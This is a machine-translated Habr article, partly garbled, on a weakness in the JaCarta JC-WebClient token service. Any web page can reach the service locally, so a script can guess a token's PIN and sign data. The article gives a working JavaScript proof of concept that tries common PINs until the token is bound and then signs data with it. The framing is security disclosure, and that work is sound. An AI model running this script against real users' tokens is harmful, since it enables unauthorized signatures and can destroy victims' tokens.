Geekly articles weekly

Testen Sie JaCarta WebClient oder bewahren Sie Token in einem Safe auf

"Als die schwarze Decke für einen Moment weggeblasen wurde, drehte sich Margarita um und sah, dass es nicht nur mehrfarbige Türme mit einem Flugzeug über ihnen gab, sondern auch keine Stadt selbst, die in den Boden gegangen war und nur Nebel hinterlassen hatte."

M.A. Bulgakow
"Der Meister und Margarita"

Hallo Habr! Wahrscheinlich hat fast jede russische Organisation diese Produkte in einer fröhlichen mehrfarbigen Farbe. Wir sprechen über JaCarta-Produkte und -Software für sie. Dieses Glück fiel auch mir zu und ich beschloss, die schwarze Abdeckung, die ihre Essenz oder API verbirgt, leicht zu erweitern. Einige Banken, insbesondere die Ausgabe von JaCarta GOST-2-Token an ihre Kunden, benötigen die Installation der JC-WebClient-Anwendung von Aladdin R.D.

Obwohl es auf der offiziellen Website des Entwicklers keine neue Distribution gibt (im Demo-Bereich können Sie eine ältere Version herunterladen, aber die veraltete API verwendet), kann die Distribution über Google in der Zeile "JC-WebClient-4.0.0.1186" auf den Websites des RB gefunden werden.

Nach der Installation der Anwendung auf dem Computer des Benutzers wird Port 24738 geöffnet, auf dem dieser Client arbeitet.

https://localhost:24738/JCWebClient.js

Die Entwickler-Website beschreibt offen und detailliert die API dieser Anwendung (sowie die Funktionen der Arbeit mit dem Dateisystem der gesamten Token-Zeile dieses Herstellers über jcFS.dll, das Teil des Installationspakets „JaCarta Single Client“ ist). Unter dem Strich können Sie eine Reihe von Funktionen verwenden Signieren Sie die digitale Signatur des Tokens mit irgendetwas, holen Sie sich einen PIN-Code oder blockieren Sie das Token mit erfolglosen Versuchen, es einzugeben. Und das alles aus der Ferne über das Internet.

Es ist kein Geheimnis, dass Benutzer häufig den Standard-PIN-Code für das Token oder den, mit dem sie ihn erhalten haben, belassen (sie befürchten normalerweise, dass beim Ändern des PIN-Codes alles nicht mehr funktioniert).

Am häufigsten werden PIN-Codes vom Typ 123456 verwendet, und das Token wird während des Arbeitstages oder sogar rund um die Uhr in den Computeranschluss oder den USB-Hub eingefügt.

Dank JC-WebClient können Sie, wenn Sie einem solchen Benutzer eine Webseite oder eine E-Mail mit einfachem JavaScript übermitteln, die Token-Schlüssel zwar nicht erhalten (in einigen Fällen ist dies nur durch direkten Zugriff auf das Token-Dateisystem möglich, ein Beispiel wurde bereits angegeben ), aber versuchen Sie es Nehmen Sie einen PIN-Code und signieren Sie alle Daten und senden Sie sie irgendwohin.

Bei 10 erfolglosen Iterationsversuchen wird das Token blockiert. Wenn der Administratorcode zum Entsperren nicht festgelegt ist, hilft nur die Initialisierung. Und dies wird nicht auf Zeitsteuern gezahlt (und aufgrund von Zinsen und sogar der Sperrung des Steuerkontos der Organisation der Steuer), Verluste von Lieferanten, im Allgemeinen ist gut nicht genug.



Das Problem mit der Aufzählung des PIN-Codes könnte entweder dadurch gelöst werden, dass er nur über das JC-WebClient-Schnittstellenfenster eingegeben werden kann, oder als halbe Maßnahme, beispielsweise bei drei erfolglosen Versuchen, ihn einzugeben, die weitere Autorisierung blockieren, indem dem Benutzer eine Nachricht angezeigt wird, und warten, bis er es tut wird Ihre Aktionen bestätigen.

Ich habe ein kleines Testskript geschrieben, das diese Sicherheitsanfälligkeit zeigt. Das Skript funktioniert in allen modernen und relativ modernen Browsern, auch im Internet Explorer :)

Natürlich sendet es nirgendwo etwas, sondern zeigt einfach die Ergebnisse einer Folge von Funktionen an.

Das Skript implementiert eine vollständige Aufzählung von 10 Versuchen, den PIN-Code "zum Töten" des Tokens einzugeben, sodass Sie das Skript nur mit einem Test-Token ausführen können!

Es sollte auch beachtet werden, dass die Verwendung dieses Skripts außer auf seinem eigenen Test-Token einen Verstoß gegen das Gesetz darstellt.

Testergebnis:


Das Skript generiert mit JC-WebClient zum Testen ein Schlüsselpaar und ein Zertifikat.
Sie können EToken PRO Java 72 K, JaCarta GOST und JaCarta GOST-2 verwenden. Das Token muss mit der Benutzer-PIN 111111 vorinitialisiert werden.

Bevor Sie mit dem Testen beginnen, müssen Sie JC-WebClient Version 4 oder höher installieren.

 // JCWebClient2 JCWebClient2.initialize(); document.write("JC-WebClient   "+" "); //  JCWebClient2 var vers=JCWebClient2.getJCWebClientVersion(); document.write(" JCWebClient2 " + vers +" "); //         var slots = JCWebClient2.getAllSlots(); document.write(" : "+slots.length+" "); //   for (i = 0; i < slots.length; i++) { var slot = slots[i]; document.write(": "+slot.device.name+" "+slot.device.model+" "); } var tokenID = slot.id, //   userPin = '111111'; // PIN-  //       // (  JCWebClient2.Vars.AuthState.notBinded) var tokenState = JCWebClient2.getLoggedInState(); document.write('1) Token is binded: ' + (tokenState.state == JCWebClient2.Vars.AuthState.binded)+" "); //  PIN- JCWebClient2.bindToken({ args: { tokenID: tokenID, pin: userPin } }); //    // (  JCWebClient2.Vars.AuthState.binded) tokenState = JCWebClient2.getLoggedInState(); document.write('2) Token is binded: ' + (tokenState.state == JCWebClient2.Vars.AuthState.binded)+" "); //          var keyPairID = JCWebClient2.createKeyPair({ args: { paramSet: "XA", description: "my description", algorithm: JCWebClient2.Vars.KeyAlgorithm.GOST_2012_256 } }); //     (Distinguished Name (DN)), //    (Common Name, (CN)) var dn = { 'CN': '123', 'C': 'RU' }; //  ,      var exts = { 'keyUsage': 'Digital Signature' }; //   var contID = JCWebClient2.generateUserSelfSignedCertificate({ args: { keyPairID: keyPairID, dn: dn, exts: exts, days: 365 } }); //    var list=[]; //   list = JCWebClient2.getContainerList({ args: { tokenID: tokenID } }); // id      var data = list[0]; var contID = data.id; document.write("ID : "+data.id+" "); document.write(" : "+data.description+" "); document.write(" : "+data.algorithm+" "); //   PIN- JCWebClient2.unbindToken();

Und eigentlich das Sicherheitsüberprüfungsskript selbst:

 // JCWebClient2 JCWebClient2.initialize(); document.write("JC-WebClient   "+" "); //  JCWebClient2 var vers=JCWebClient2.getJCWebClientVersion(); document.write(" JCWebClient2 " + vers +" "); //         var slots = JCWebClient2.getAllSlots(); document.write(" : "+slots.length+" "); //   for (i = 0; i < slots.length; i++) { var slot = slots[i]; document.write(": "+slot.device.name+" "+slot.device.model+" "); } //   var tokenID = slot.id; //       // (  JCWebClient2.Vars.AuthState.notBinded) var tokenState = JCWebClient2.getLoggedInState(); document.write('Token is binded: ' + (tokenState.state == JCWebClient2.Vars.AuthState.binded)+" "); //    var list=[]; //   list = JCWebClient2.getContainerList({ args: { tokenID: tokenID } }); // id     var data = list[0]; var contID = data.id; document.write("ID : "+data.id+" "); document.write(" : "+data.description+" "); document.write(" : "+data.algorithm+" "); //    (Hello World  Base64) var dataToSign = 'SGVsbG8sIFdvcmxkIQ=='; document.write("  : "+dataToSign+" "); //   var pin=["1234567890", "123456", "1234567", "12345678", "123456789", "0987654321", "111111", "qwerty", "012345", "0123456", "01234567"]; //  function bind(pass) { JCWebClient2.bindToken({ args: { tokenID: tokenID, pin: pass } }); } var i=0; //     //!  10    !!!!!!!!!! while (i < 10) { i++; try{ bind(pin[i]); tokenState = JCWebClient2.getLoggedInState(); //  ,      if(tokenState.state=1) { document.write("   : "+pin[i]+" "); break; } } //    catch(e){document.write(e+" ");} } //    // (  JCWebClient2.Vars.AuthState.binded) tokenState = JCWebClient2.getLoggedInState(); document.write('Token is binded: ' + (tokenState.state == JCWebClient2.Vars.AuthState.binded)+" "); //   var CertificateBody=JCWebClient2.getCertificateBody({ args: { id: contID } }); document.write("CertificateBody: "+CertificateBody+" "); //  ,        Base64 var signedData = JCWebClient2.signBase64EncodedData({ args: { contID: contID, data: dataToSign, attachedSignature: true } }); document.write(" . "); document.write(" : "+signedData+" "); //  var signature = signedData; var res = JCWebClient2.verifyBase64EncodedData({ args: { signature: signature } }); document.write("  : "+res+" "); //   PIN- JCWebClient2.unbindToken();

Informationsquelle der JC-WebClient-API

Source: https://habr.com/ru/post/de439790/

More articles:


All Articles